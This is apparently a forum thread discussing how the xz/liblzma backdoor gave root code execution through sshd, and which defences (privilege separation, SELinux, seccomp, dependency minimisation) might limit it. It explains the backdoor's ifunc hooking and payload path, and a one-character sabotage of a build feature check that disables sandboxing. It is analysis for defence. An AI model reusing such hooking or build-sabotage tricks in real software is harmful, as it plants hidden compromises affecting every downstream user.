EDIT: Here's some more RE work on the matter. Has some symbol remapping information that was extracted from the prefix trie the backdoor used to hide strings. Looks like it tried to hide itself even from RE/analysis, too.
The backdoor pulls this from the certificate received from a remote attacker, attempts to decrypt it with ChaCha20, and, if it decrypts successfully, passes it to `system()`, which is essentially a simple wrapper that executes a line of shell script as whichever user the process is currently running.
If I'm understanding things correctly, this is worse than a public key bypass (which I, and I think a number of others, presumed it might be) - a public key bypass would, in theory, only allow you access as the user you're logging in with. Presumably, hardened SSH configurations would disallow root access.
However, since this is an RCE in the context of, e.g., the sshd process itself, an sshd running as root allows the payload itself to run as root.
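To make that last point concrete, here's a rough sketch of what system(3) boils down to (minus its signal handling and exact return-value semantics); `my_system` is just an illustrative name:

```c
/* Rough sketch of what system(3) does, minus signal handling: the command
 * line runs under /bin/sh as whatever user the calling process is, which
 * for sshd's listener is root. */
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

static int my_system(const char *cmd)
{
    pid_t pid = fork();
    if (pid == 0) {
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
        _exit(127);                 /* exec failed */
    }
    int status = -1;
    if (pid > 0)
        waitpid(pid, &status, 0);
    return status;
}
```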
Wild. This is about as bad as a widespread RCE can realistically get.
> However, since this is an RCE in the context of, e.g., the sshd process itself, an sshd running as root allows the payload itself to run as root.
With the right sandboxing techniques, SELinux and other mitigations could prevent the attacker from doing anything with root permissions. However, applying a sandbox to an SSH daemon effectively is very difficult.
You could refactor sshd so most network payload processing is delegated to sandboxed sub-processes. An RCE there would then have fewer capabilities to exploit directly. But I think you would have to assume an RCE can cause the sub-process to produce wrong answers. So if the answers are authorization decisions, you can transitively turn those wrong answers into RCE in the normal login or remote command execution context.
But, the normal login or remote command execution is at least audited. And it might have other enforcement of which accounts or programs are permitted. A configuration disallowing root could not be bypassed by the sub-process.
You could also decide to run all user logins/commands under some more confined SE-Linux process context. Then, the actual user sessions would be sandboxed compared to the real local root user. Of course, going too far with this may interfere with the desired use cases for SSH.
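To sketch the shape of that pattern (heavily trimmed; the unprivileged uid/gid, the /var/empty chroot, and the one-byte "verdict" protocol are placeholders, not what OpenSSH actually does in this form):

```c
/* Sketch of the privilege-separation pattern: the privileged parent forks
 * a worker, drops the worker to an unprivileged uid/gid in an empty
 * chroot, and only exchanges parsed results over a socketpair. Error
 * handling trimmed for brevity; UNPRIV_UID/GID and EMPTY_DIR are made up. */
#include <grp.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define UNPRIV_UID 70000      /* placeholder unprivileged account */
#define UNPRIV_GID 70000
#define EMPTY_DIR  "/var/empty"

static void worker(int fd)
{
    /* give up root before touching any network-supplied data */
    if (chroot(EMPTY_DIR) || chdir("/") ||
        setgroups(0, NULL) || setgid(UNPRIV_GID) || setuid(UNPRIV_UID))
        _exit(1);

    char buf[4096];
    ssize_t n = read(fd, buf, sizeof buf);   /* untrusted payload */
    char verdict = (n > 0) ? 'N' : 'E';      /* pretend we parsed it */
    if (write(fd, &verdict, 1) != 1)         /* parent must not trust this either */
        _exit(1);
    _exit(0);
}

int main(void)
{
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv))
        return 1;

    pid_t pid = fork();
    if (pid == 0) {
        close(sv[0]);
        worker(sv[1]);
    }
    close(sv[1]);
    /* ... privileged parent sends payloads on sv[0] and reads one-byte
     * verdicts back, never treating them as authorization decisions ... */
    waitpid(pid, NULL, 0);
    return 0;
}
```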
That just raises the hurdle for the attacker. The attacker in this case has full control to replace any function within ssh with their own version, and the master process of sshd will always need the ability to fork and still be root on the child process before dropping privileges. I don't see any way around that. They only needed to override one function this time, but if you raise the bar they would just override more functions and still succeed.
In highly safety-critical systems you have software (and hardware) diversity, where multiple pieces of software, developed independently, have to vote on the result. Maybe highly critical pieces of Linux like the login process should be designed the same way, so that two binaries without common dependencies would need to accept the login for the user to get privileges.
Exactly how to do it (especially transparently for the user), I have no idea though. Maybe sending ssh login requests to two different sshd implementations and if they don’t do the same things (same system calls), they are both killed.
Or some kind of two step login process where the first login only gives access to the sandbox of the second login process.
But in general I assume the Linux attack surface is too big to do software diversity for all of it.
Or better, just make an ssh without any dependencies. Statically compile it, and get rid of the libssl and libsystemd and even libpam and libc's nsswitch. (I actually do this for some of my systems)
> The attacker in this case has full control to replace any function within ssh with their own version
Not true. They have this ability only for binaries that are linked to liblzma. If sshd were to be decomposed into multiple processes, not all of them would (hopefully) depend on all the libraries that the original sshd depended on.
Well, sshd doesn't depend on liblzma in the first place, but Debian and RedHat thought it would be a good idea to tie it into libsystemd for logging purposes, and patched in support. It's still pretty bad to have systemd compromised, even if ssh weren't, though. Maybe the army of pitchforks should be marching on the systemd camp. It's definitely not OpenBSD's choice of architecture, here.
It wouldn't matter in this case, since the exploit could simply rewrite the function that calls out to the unprivileged process. If you already have malicious code in your privileged parent process there's no way to recover from that.
Tell us all, please, how the starting vector of this attack would affect a statically compiled dropbear binary, even with systemd's libsystemd pwnage? I am very curious about your reasoning.
The fact that the whole reason this library is even being pulled into the sshd daemon process is some stupid stuff like readiness notification, which is itself utterly broken on systemd by design (and thus forever unfixable), makes this even more tragic.
Don't put your head in the sand just because of the controversial nature of the topic. Systemd was VERY accommodating in this whole fiasco.
The saddest part of all this is that we know how to do better, at least since Bernstein, OpenBSD, and the supervision community (runit/s6) guys solved it. Yet somehow we see the same mistakes repeated again and again.
I.e., you fork and run a little helper to write, or directly write, a single byte(!) over a supervisor-provided fd to notify the supervisor that you're ready. It even allows you to privilege-separate your notifier stuff or do all the cute SELinux magic you need.
But that would be too simple, I guess, so instead we link something like 10 completely unrelated libraries, liblzma being one of them, into sshd, one of the most crucial processes on the machine. To notify the supervisor that it's ready. Sounds about right, Linux distros (and very specific ones at that).
Sshd should be sacred: it should need nothing more than libc and some base crypto libs (I don't even remember whether it still needs <any>ssl).
Another great spot to break sshd is PAM, which has no place being there either. Unfortunately it's a hard dependency on most Linux distros.
Maybe sshd should adopt the kernel taint approach: as soon as any weird libraries (i.e. everything not libc and crypto libs) are detected in the sshd process, it should consider itself tainted. Maybe even seppuku itself.
The exploit would probably have been somehow doable without systemd, but it would have been much, much harder.
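A minimal sketch of that style of readiness notification (the NOTIFY_FD variable name is a placeholder; real supervisors like s6 agree on the descriptor number by other means, e.g. the service's notification-fd setting):

```c
/* Supervision-style readiness: write one newline to a descriptor the
 * supervisor gave us, then close it. NOTIFY_FD is a made-up convention
 * for illustration only. */
#include <stdlib.h>
#include <unistd.h>

static void notify_ready(void)
{
    const char *s = getenv("NOTIFY_FD");
    if (!s)
        return;                     /* not running under a supervisor */
    int fd = atoi(s);
    ssize_t r = write(fd, "\n", 1); /* one byte says "ready" */
    (void)r;                        /* readiness is best-effort */
    close(fd);
}
```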
Don't try to obfuscate that very fact from the discussion.
The sd-notify protocol is literally "Read socket address from environment variable, write a value to that socket". There's no need to link in libsystemd to achieve this. It's unreasonable to blame systemd for projects that choose to do so. And, in fact, upstream systemd has already changed the behaviour of libsystemd so it only dlopen()s dependencies if the consumer actually calls the relevant entry points - which would render this attack irrelevant.
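For reference, the whole notification side of that protocol fits in a few lines of C; a hedged sketch (no libsystemd, just the NOTIFY_SOCKET datagram described above):

```c
/* Minimal sd_notify("READY=1") without libsystemd: send one datagram to
 * the AF_UNIX socket whose address is in $NOTIFY_SOCKET. A leading '@'
 * denotes an abstract-namespace socket. Error handling kept terse. */
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/un.h>
#include <unistd.h>

static int notify_ready(void)
{
    const char *path = getenv("NOTIFY_SOCKET");
    if (!path || !*path)
        return 0;                       /* not running under systemd */

    struct sockaddr_un addr;
    memset(&addr, 0, sizeof addr);
    addr.sun_family = AF_UNIX;
    if (strlen(path) >= sizeof addr.sun_path)
        return -1;
    strncpy(addr.sun_path, path, sizeof addr.sun_path - 1);
    if (addr.sun_path[0] == '@')
        addr.sun_path[0] = '\0';        /* abstract namespace */

    int fd = socket(AF_UNIX, SOCK_DGRAM | SOCK_CLOEXEC, 0);
    if (fd < 0)
        return -1;

    const char msg[] = "READY=1\n";
    socklen_t len = offsetof(struct sockaddr_un, sun_path) + strlen(path);
    ssize_t n = sendto(fd, msg, strlen(msg), 0,
                       (struct sockaddr *)&addr, len);
    close(fd);
    return n < 0 ? -1 : 0;
}
```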
> Another great spot to break sshd is PAM, which has no place being there either. Unfortunately it's a hard dependency on most Linux distros.
There are many things to hate about PAM (it should clearly be a system daemon with all of the modules running out of process), but there's literally no universe where you get to claim that sshd should have nothing to do with PAM - unless you want to plug every single possible authentication mechanism into sshd upstream you're going to end up with something functionally identical.
That's an easy thing to say after the fact indeed but yes. In fact after such a disastrous backdoor I wouldn't be surprised if OpenSSH moved all code calling external libraries to unprivileged processes to make sure such an attack can never have such a dramatic effect (an auth bypass would still likely be possible, but that's still way better than a root RCE…).
At this point “All libraries could be malicious” is a threat model that must be considered for something as security critical as OpenSSH.
I don't think that's a threat model that OpenSSH should waste too much time on. Ultimately this is malicious code in the build machine compiling a critical system library. That's not reasonable to defend against.
Keep in mind that upstream didn't even link to liblzma. Debian patched it to do so. OpenSSH should defend against that too?
Any one of us, if we sat on the OSSH team, would flip the middle finger. What code is the project supposed to write when nothing in mainline dynamically loaded liblzma? It was brought in by a patch they don't have realistic control over.
This is a Linux problem, and the problem is systemd, which is who brought the lib into memory and init'd it.
I think the criticisms of systemd are valid but also tangential. I think Poettering himself is on one of the HN threads saying they didn't need to link to his library to accomplish what they sought to do. Lzma is also linked into a bunch of other critical stuff, including but not limited to distro package managers and the kernel itself, so if they didn't have sshd to compromise, they could have chosen another target.
So no, as Poettering claimed, sshd would not be hit by this bug except for this systemd integration.
I really don't care about "Oh, someone could have written another compromise!". What allowed for this compromise was a direct inability of systemd to reliably do its job as an init system, necessitating a patch.
And Redhat, Fedora, Debian, Ubuntu, and endless other distros took this route because something was required, and here we are. Something that would not be required if systemd could actually perform its job as an init system without endless workarounds.
Also see my other reply in this thread, re Redhat's patch.
I just went and read https://bugzilla.redhat.com/show_bug.cgi?id=1381997 and actually seems to me that sshd behavior is wrong, here. I agree with the S6 school of thought, i.e. that PID files are an abomination and that there should always be a chain of supervision. systemd is capable of doing that just fine. The described sshd behavior (re-execing in the existing daemon and then forking) can only work on a dumb init system that doesn't track child processes. PID files are always a race condition and should never be part of any service detection.
That said, there are dozens of ways to fix this and it really seems like RedHat chose the worst one. They could have patched sshd in the other various ways listed in that ticket, or even just patch it to exit on SIGHUP and let systemd re-launch it.
I'm not the type to go out of my way to defend systemd and their design choices. I'm just saying the severity of this scenario of a tainted library transcends some of the legit design criticisms. If you can trojan liblzma you can probably do some serious damage without systemd or sshd.
Of course you can trojan other ways, but that can only be said, in this thread, in defense of systemd.
After all, what you're saying is and has always been the case! It's like saying "Well, Ford had a design flaw in this Pinto, and sure 20 people died, but... like, cars have design flaws from time to time, so an accident like this would've happened eventually anyhow! Oh well!"
It doesn't jibe in this context.
Directly speaking to this point, patched ssh was chosen for a reason. It was the lowest hanging fruit, with the greatest reward. Your speculation about other targets isn't unwarranted, but at the same time, entirely unvalidated.
Why avoid this? Well, it adds more systemd-specific bits and a new build dependency to something that had always worked well under other inits without any problems for years.
They chose the worst solution to a problem that had multiple better solutions, because a pre-existing patch was the easiest path forward. That’s exactly what I’m talking about.
It is possible to prevent libraries from patching functions in other libraries; make those VM regions unwritable, don't let anyone make them writable, and adopt PAC or similar hardware protection so the kernel can't overwrite them either.
That's already done, but in this case the attack happened in a glibc ifunc and those run before the patching protection is enabled (since an ifunc has to patch the PLT).
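For anyone who hasn't met ifuncs: the resolver is ordinary code the dynamic linker runs while it is still filling in the GOT/PLT, i.e. before full RELRO can remap those tables read-only. A harmless toy example of the mechanism (GCC on x86-64/glibc assumed; this is not the backdoor's code):

```c
/* Toy GNU ifunc: foo() is bound at load time to one of two
 * implementations, chosen by a resolver that the dynamic linker calls
 * while relocating this object, before the relocated tables get
 * remapped read-only under full RELRO. */
#include <stdio.h>

static int foo_generic(void) { return 1; }
static int foo_fancy(void)   { return 2; }

/* The resolver returns the function pointer to bind. Legitimate resolvers
 * pick CPU-specific implementations; the xz backdoor abused this hook to
 * run its own setup code at this early stage. */
static int (*resolve_foo(void))(void)
{
    __builtin_cpu_init();
    return __builtin_cpu_supports("avx2") ? foo_fancy : foo_generic;
}

int foo(void) __attribute__((ifunc("resolve_foo")));

int main(void)
{
    printf("foo() -> %d\n", foo());
    return 0;
}
```

The point is simply that a resolver runs arbitrary code at a stage where the usual write protections aren't in force yet.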
Sounds like libraries should only get to patch themselves.
(Some difficulty with this one though. For instance you probably have to ban running arbitrary code at load time, but you should do this anyway because it will stop people from writing C++.)
If you're running in the binary you can call mprotect(2), and even if that is blocked you can cause all kinds of mischief. The original motivation for rings of protection on i286 was so that libraries could run in a different ring from the binary (usually library in ring 2 and program in ring 3), using a call gate (a very controlled type of call) to dispatch calls from the binary to the library, which stops the binary from modifying the library and IIRC libraries from touching each other. But x86-64 got rid of the middle rings.
> If you're running in the binary you can call mprotect(2)
Darwin doesn't let you make library regions writable after dyld is finished with them. (Especially iOS where codesigning also prevents almost all other ways to get around this.)
Something like OpenBSD pledge() can also revoke access to it in general.
> But x86-64 got rid of the middle rings.
x86 is a particularly insecure architecture but there's no need for things to be that way. That's why I mentioned PAC, which prevents other processes (including the kernel) from forging pointers even if they can write to another process's memory.
Because it's a general purpose computer. Duh. The aim is to be able to perform arbitrary computations. And overwriting crypto functions in sshd is, as far as the machine is concerned, a valid computation.
I don't think you should connect your general purpose computer to the internet then. Or keep any valuable data on it. Otherwise other people are going to get to perform computations on it.
You can definitely prevent a lot of file/executable accesses via SELinux by running sshd in the default sshd_t or even customizing your own sshd domain and preventing sshd from being able to run binaries in its own domain without a transition. What you cannot prevent though is certain things that sshd _requires_ to function like certain capabilities and networking access.
by default sshd has access to all files in /home/$user/.ssh/, but that could be prevented by giving private keys a new unique file context, etc.
SELinux would not prevent all attacks, but it can mitigate quite a few as part of a larger security posture
libselinux is the userspace tooling for SELinux; it is irrelevant to this specific discussion, as the backdoor does not target SELinux in any way, and sshd does not have the capabilities required to make use of the libselinux tooling anyway
libselinux is just an unwitting vector to link liblzma with openssh
Even though sshd must run as root (in the usual case), it doesn't need unfettered access to kernel memory, most of the filesystem, most other processes, etc. However, you could only really sandbox sshd-as-root. In order for sshd to do its job, it does need to be able to masquerade as arbitrary non-root users. That's still pretty bad but generally not "undetectably alter the operating system or firmware" bad.
>Even though sshd must run as root (in the usual case), it doesn't need unfettered access to kernel memory, most of the filesystem, most other processes, etc
This is sort of overlooking the problem. While true, the processes spawned by sshd do need to be able to do all these things and so even if you did sandbox it, preserving functionality would all but guarantee an escape is trivial (...just spawn bash?).
SELinux context is passed down to child processes. If sshd is running as confined root (system_u:system_r:sshd_t or similar), then the bash spawned by RCE will be too. Even if sshd is allowed to masquerade as an unconfined non-root user, that user will (regardless of SELinux) be unable to read or write /dev/kmem, ignore standard file permissions, etc.
That's my point though--users expect to be able to do those things over ssh. Sandboxing sshd is hard because its child processes are expected to be able to do anything that an admin sitting at the console could do, up to and including reading/writing kernel memory.
I'm assuming SSH root login is disabled and sudo requires separate authentication to elevate, but yeah, if there's a way to elevate yourself to unconfined root trivially after logging in, this doesn't buy you anything.
Now, sandboxing sudo (in the general case) with SELinux probably isn't possible.
This does not matter either. The attack came in via liblzma, which libsystemd pulls into the sshd process. It puts a hook in place, waits until sshd's symbols are resolved so it can learn them, then proceeds to swap in the jumps.
sshd is a sitting duck. Bifurcating sshd into a multimodule scheme won't work because some part of it still has to link against libsystemd and whatever that drags in.
This is a web-of-trust issue. In the .NET world, where reflection attacks happen to commercial software that features dynamically loaded assemblies, the only solution they could come up with is to sign all the things, then box up anything that doesn't have a signing mechanism and sign that too, even plain old zip files.
Some day we will all have to have keys. To keep the anonymous people from leaving, they can get an anon key, but anons with keys will never get onto the chain where the big distros would trust their commits, not until someone who forked over their passport and photos, and got a trustable key, signs off on the commits so that the distro builders can greenlight pulling them in.
Then, I guess, to keep the anons hopeful that they are still in the SDLC somewhere, their commits can go into the completely untrusted-unstable-crazytown release that no institution in their right mind would ever lay down in production.
I’ll admit to not being an expert in SELinux, but it seems like an impossibly leaky proposition. Root can modify systemd startup files, so just do that in a malicious way and reboot the system; that context won’t be propagated. And if you somehow prohibit root from doing that by SELinux policy, then you end up with a system that can’t actually be administered.
[edit: sibling sweetjuly said it better than I could. I doubt that this much more than a fig leaf on any real world system given what sshd is required to have to do.]
SELinux domains are decoupled from Linux users. If sshd does not have SELinux permissions to edit those files, it will simply be denied, even if sshd is run as root.
Which amounts to the un-administerable system I mentioned. If it’s not possible to modify systemd config files using ssh, what happens when you need to edit them?
Really what they're proposing here is a non-modifiable system, where the root is read-only and no user can modify anything important.
Which is nice and all, but that implies a "parent" system that creates and deploys those systems. Which people likely want remote access to.. Probably by sshd...
You can limit the exposure of the system from RCE in sshd with SELinux without preventing legitimate users from administering the system.
Granted that SELinux is overly complicated and has some questionable design decisions from a usability standpoint but it's not as limited or inflexible as many seem to think.
It really can stop a system service running as "root" from doing things a real administrator doesn't want it to do. You can couple it with other mechanisms to achieve defense in depth. While any system is only as strong as its weakest link, you can use SELinux to harden sshd so even with exploits in the wild it's not the weakest link vis-a-vis an attacker getting full unconfined root access. This may or may not be worth your time depending on what that box is doing and how connected to the rest of your infrastructure it is.
There seems to be a pervasive misunderstanding of the difference between standard UNIX/Linux discretionary access control and SELinux-style mandatory access control. The latter cannot be fooled into acting as a confused deputy anywhere near as easily as the former. The quality of the SELinux policy on a particular system plays a big part in how effective it is in practice but a good policy will be far harder to circumvent than anything the conventional permissions model is capable of.
Moreover, while immutability is obviously an even stronger level of protection, it is not necessary to make the system immutable to accomplish what I've described here while still allowing legitimately and separately authenticated users to fully administer the system.
Most people turn SELinux off anyway, so they have no clue how it operates.
DACs (discretionary, unix perms) are DACs and MACs (mandatory, SELinux) are MACs. They are mandatory - it's in their name.
Think of SELinux as a completely orthogonal access control system that can overturn any DAC decision, which it in fact does. The SELinux policy language is much more expressive than the DAC model; it can express domain transitions.
Nobody here has inspected the sshd_t policies but I believe exec transition should be forbidden for arbitrary binaries (I hope).
That should in essence thwart arbitrary exec from remote key payload.
If actual shellcode would be sent though (e.g. doing filesystem open/write/close), that is a little bit different.
It's possible to spawn an sshd as an unprivileged or partially-capabilitized process. Such a sandbox isn't the default deployment, but it's done often enough, and it would work as designed to prevent privilege elevation above the sshd process.
SELinux does not rely on the usual UID/GID to determine what a process can do. System services, even when running as "root", are running as confined users in SELinux. Confined root cannot do anything which SELinux policy does not allow it to do. This means you can let sshd create new sessions for non-root users while still blocking it from doing the other things which unconfined root would be able to do. This is still a lot of power but it's not the godlike access which a person logged in as (unconfined) root has.
Doesn't matter. A malicious sshd able to run commands as arbitrary users can just run malicious commands as those users.
We'd need something more like a cryptographically attested setreuid() and execve() combination that would run only commands signed with the private key of the intended user. You'd want to use a shared clock or something to protect against replay attacks.
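Purely as a strawman of what that could look like: a sketch using libsodium Ed25519 verification, a made-up "timestamp:command" wire format, and a crude clock-skew check. None of these names or formats exist anywhere today.

```c
/* Strawman only: run a command as a target user iff ("timestamp:cmd")
 * verifies against that user's Ed25519 public key and the timestamp is
 * recent. Uses libsodium (link with -lsodium); MAX_SKEW, the wire format
 * and the function name are all invented for illustration. */
#include <sodium.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <unistd.h>

#define MAX_SKEW 30 /* seconds; crude shared-clock replay protection */

int run_if_signed(const char *cmd, time_t stamp,
                  const unsigned char sig[crypto_sign_BYTES],
                  const unsigned char pk[crypto_sign_PUBLICKEYBYTES],
                  uid_t uid, gid_t gid)
{
    if (sodium_init() < 0)
        return -1;
    if (llabs((long long)(time(NULL) - stamp)) > MAX_SKEW)
        return -1;                              /* stale: possible replay */

    unsigned char msg[4096];
    int len = snprintf((char *)msg, sizeof msg, "%lld:%s",
                       (long long)stamp, cmd);
    if (len < 0 || (size_t)len >= sizeof msg)
        return -1;

    if (crypto_sign_verify_detached(sig, msg, (unsigned long long)len, pk))
        return -1;                              /* bad signature */

    if (setgid(gid) || setuid(uid))             /* drop to the target user */
        return -1;
    execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
    return -1;                                  /* exec failed */
}
```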
Yes, this won't directly protect against an attacker whose goal is to create a botnet, mine some crypto on your dime, etc. However, it will protect against corruption of the O/S itself and, in tandem with other controls, can limit the abilities an attacker has, and ensure things like auditing are still enforced (which can be tied to monitoring, and also used for forensics).
Whether it's worth it or not depends on circumstances. In many cloud environments, nuking the VM instance and starting over is probably easier than fiddling with SELinux.
even easier is to STOP HOSTING SSHD ON IPV4 ON CLEARNET
at minimum, ipv6 only if you absolutely must do it (it absolutely cuts the scans way down)
better is to only host it on vpn
even better is to only activate it with a portknocker, over vpn
even better-better is to set up a private ipv6 peer-to-peer cloud and socat/relay to the private ipv6 network (yggdrasil comes to mind, but there's other solutions to darknet)
your sshd you need for server maintenance/scp/git/rsync should never be hosted on ipv4 clearnet where a chinese bot will find it 3 secs after the route is established after boot.
How about making ssh as secure as (or more secure than) the VPN you'd put it behind? Considering the amount of vulnerabilities in corporate VPNs, I'd even put my money on OpenSSH today.
It's not like this is SSH's fault anyway, a supply chain attack could just as well backdoor some Fortinet appliance.
Defence in depth. Which of your layers is "more secure" isn't important if none are "perfectly secure", so having an extra (independent) layer such as a VPN is a very good idea.
You have to decide when to stop stacking, otherwise you'd end up gating access behind multiple VPNs (and actually increasing your susceptibility to hypothetical supply-chain attacks that directly include a RAT).
I'd stop at SSH, since I don't see a conceptual difference to how a VPN handles security (unless you also need to internally expose other ports).
OpenSSH has a much smaller attack surface, is thoroughly vetted by the best brains on the planet, and is privilege separated and sandboxed. What VPN software comes even close to that?
The only software remotely in the same league is a stripped down Wireguard. There is a reason the attacker decided to attack liblzma instead of OpenSSH.
I imagine it stops some non-targeted attempts that simply probe the entire v4 range, which is not feasible with v6. But yeah, not really buying you much, especially if there is any publicly listed service on that IP.
If you have password authentication disabled then it shouldn't matter how many thousands of times a day people are scanning and probing sshd. Port knockers, fail2ban, and things of that nature are just security by obscurity that don't materially increase your security posture. If sshd is written correctly and securely it doesn't matter if people are trying to probe your system, if it's not written correctly and securely you're SOL no matter what.
Plausibly by having set-user-ID capability but not others an attacker might need.
But in the more common case it just doesn't: you have an sshd running on a dedicated port for the sole purpose of running some service or another under a specific sandboxed UID. That's basically the github business model, for example.
I need full filesystem access, VIM, ls, cd, grep, awk, df, du at the very least. Sometimes perl, find, ncdu, and other utilities are necessary as well. Are you suggesting that each tool have its own SSH process wrapping it?
Maybe write a shell to coordinate between them? It should support piping and output redirection, please.
Sigh. I'm not saying there's a sandboxed sshd setup that has equivalent functionality to the default one in your distro. I'm not even saying that there's one appropriate for your app.
I'm saying, as a response to the point above, that sandboxing sshd is absolutely a valid defense-in-depth technique for privilege isolation, that it would work against attacks like this one to prevent whole-system exploitation, and that it's very commonly deployed in practice (c.f. running a git/ssh server a-la github).
Git’s use of the ssh protocol as a transport is a niche use case that ignores the actual problem. No one is seriously arguing that you can’t sandbox that constrained scenario but it’s not really relevant since it’s not the main purpose of the secure shell daemon.
It's part of a test program used for feature detection (of a sandboxing functionality), and causes a syntax error. That in turn causes the test program to fail to compile, which makes the configure script assume that the sandboxing function is unavailable, and disables support for it.
You are looking at a makefile, not C. The C code is in a string that is being passed to a function called `check_c_source_compiles()`, and this dot makes that code not compile when it should have -- which sets a boolean incorrectly, which presumably makes the build do something it should not do.
This is something that should have unit/integration tests inside the tooling itself, yeah. If your assertion is that when function X is called in environment X it should return Y, then that should be a test, especially when it’s load-bearing for security.
And tooling is no exception either. You should have tests that your tooling does the things it says on the tin and that things happen when flags are set and things don’t happen when they’re not set, and that the tooling sets the flags in the way you expect.
These aren’t even controversial statements in the JVM world etc. Just C tooling is largely still living in the 70s apart from abortive attempts to build the jenga tower even taller like autotools/autoconf/cmake/etc (incomprehensible, may god have mercy on your build). At least hand written make files are comprehensible tbh.
As far as I can tell, the check is to see if a certain program compiles, and if so, disable something. The dot makes it so that it always fails to compile and thus always disables that something.
> if a certain program compiles, and if so, disable something.
Tiny correction: [...] enable something.
The idea is: If that certain program does not compile it is because something is not available on the system and therefore needs to be disabled.
That dot undermines that logic. The program fails because of a syntax error caused by the dot and not because something is missing.
It is easy to overlook because that dot is tiny and there are many such tests.
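To make the mechanics concrete, here's a hedged illustration of the general shape (not the actual xz probe, which tested Landlock support): the build system compiles a throwaway program like the one below and enables the feature only if compilation succeeds, so one stray character anywhere in the probe, like the lone '.' that was slipped in, flips the answer to "unavailable" forever.

```c
/* Hypothetical feature probe, roughly what a build system feeds to
 * check_c_source_compiles(): it only has to compile and link, not do
 * anything useful. In the sabotaged xz build, a single '.' hidden on one
 * line of the (Landlock) probe guaranteed a syntax error, so the result
 * was always "feature unavailable" and the sandbox was never enabled. */
#include <sys/prctl.h>

int main(void)
{
    /* any reference to the probed interface will do */
    return prctl(PR_GET_DUMPABLE, 0, 0, 0, 0) < 0;
}
```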
I had a similar problem with unit testing of a library. Expected failures need to be tested as well. As an example imagine writing a matrix inversion library. Then you need to verify that you get something like a division by zero error if you invert the zero matrix. You write a unit test for that and by mistake you insert a syntax error. Then you run the unit test and it fails as expected but not in the correct way.
It's subtle. It fails as expected but it fails because of unexpected wrong causes.
The desire for "does this compile on this platform" checks comes from an era where there was pretty much no way to check the error. Somebody runs it on HP-UX with the "HP-UX Ansi C Compiler" they licensed from HP and the error it spits out isn't going to look like anything you recognize.
That one's a separate attack vector, which is seemingly unused in the sshd attack. It only disables sandboxing of the xzdec(1) utility, which is not used in the sshd attack.
I guess xzdec was supposed to sandbox itself where possible so they disabled the sandbox feature check in the build system so that future payload exploits passed to xzdec wouldn’t have to escape the sandbox in order to do anything useful?
Yes, but don't forget that there are different kinds of sandboxes. SELinux never needs the cooperation of any program running on the system in order to correctly sandbox things. No change to Xz could ever make SELinux less effective.
But don't forget that xz is also used as part of dpkg for unpacking packages.
The whole purpose of dpkg is to update critical system packages. Any SELinux policy that protects against a backdoored dpkg/xz installing a rootkit during the next kernel security update will also prevent installing real kernel security updates.
The particular attack path in this OpenSSH backdoor can maybe be prevented, but we've got to realize that the attacker already had full root permissions, and there's no way of protecting against that.
SELinux policies are much more subtle than that. You don’t restrict what xz or liblzma can do, you restrict what the whole process can do. That process is either sshd or dpkg, and you can give them completely different access to the system, so that if dpkg tries to launch an interactive shell it fails, while sshd fails if it tries to overwrite a system file such as /bin/login or whatever. Neither would ordinarily do that, but the payload delivered via the back door might attempt it and wouldn’t succeed. And you would get a report stating what had happened, so if you’re paying attention the back door starts to become obvious.
Also I think dpkg switched to Zstd, didn’t it? Or am I misremembering?
But you’re not wrong; ultimately both sshd and dpkg are critical infrastructure. SELinux can prevent them from doing completely wrong things, but obviously it wouldn’t be useful for it to prevent them from doing their jobs. And those jobs are security critical already. SELinux is not a panacea, merely defense in depth.
But that's a check for a Linux feature. So the more interesting question would be, what in the Linux world might be building xz-utils with cmake, I guess using ExternalProject_Add or something similar.
sshd is probably the softest target on most systems. It is generally expected (and setup by default) so that people can gain a root shell that provides unrestricted access.
sshd.service will typically score 9.6/10 for "systemd-analyze security sshd.service", where 10 is the worst score. When systemd starts a service, it can set up a (usually) restricted namespace and apply seccomp filters before the process is executed. seccomp filters are inherited by child processes, which can then only further restrict privileges but not expand upon the inherited privileges. openssh-portable on Linux does apply seccomp filters to child processes, but this is useless in this attack scenario because sshd is backdoored by the xz library, and the backdoored library can just disable/change those seccomp filters before they take effect.
sshd is particularly challenging to sandbox because if you were to restrict the namespace and apply strict seccomp filters via the unit's sandboxing options, a user gaining a root shell via sshd (or wanting to sudo/su as root) is then perhaps prevented from remotely debugging applications, accessing certain filesystems, interacting with network interfaces, etc., depending on what level of sandboxing is applied. This choice is highly user dependent and there are probably only limited sane defaults for someone who has already decided they want to use sshd. For example, sane defaults could include creating dedicated services with sandboxing tailored just for read-only sftp user filesystem access, a separate service for read/write sftp user filesystem access, sshd tunneling, unprivileged remote shell access, etc.
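As a small aside on the "inherited and only further restrictable" point, here's a toy sketch with libseccomp (link with -lseccomp; the "no execve" policy is purely illustrative, not anything sshd installs):

```c
/* Toy demonstration that seccomp filters are inherited across fork() and
 * can only be tightened, never lifted, by descendants. */
#include <seccomp.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
    scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_ALLOW);  /* default: allow */
    if (!ctx)
        return 1;
    /* kill on execve; children inherit this and cannot remove it */
    if (seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0) ||
        seccomp_load(ctx)) {
        seccomp_release(ctx);
        return 1;
    }
    seccomp_release(ctx);

    pid_t pid = fork();
    if (pid == 0) {
        /* the inherited filter delivers SIGSYS here instead of running sh */
        execl("/bin/sh", "sh", "-c", "id", (char *)NULL);
        _exit(127);
    }
    int status = 0;
    waitpid(pid, &status, 0);
    printf("child %s\n", WIFSIGNALED(status) ? "killed by seccomp"
                                             : "ran execve");
    return 0;
}
```

Of course, as noted above, none of this helps when the malicious code is already running in the parent before the filter is ever installed.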
Doesn't matter. This is a supply chain attack, not a vulnerability arising from a bug. All sandboxing the certificate parsing code would have done is make the author of the backdoor do a little bit more work to hijack the necessarily un-sandboxed supervisor process.
Applying the usual exploit mitigations to supply chain attacks won't do much good.
What will? Kill distribution tarballs. Make every binary bit for bit reproducible from a known git hash. Minimize dependencies. Run whole programs with minimal privileges.
Oh, and finally support SHA2 in git to forever forestall some kind of preimage attack against a git commit hash.
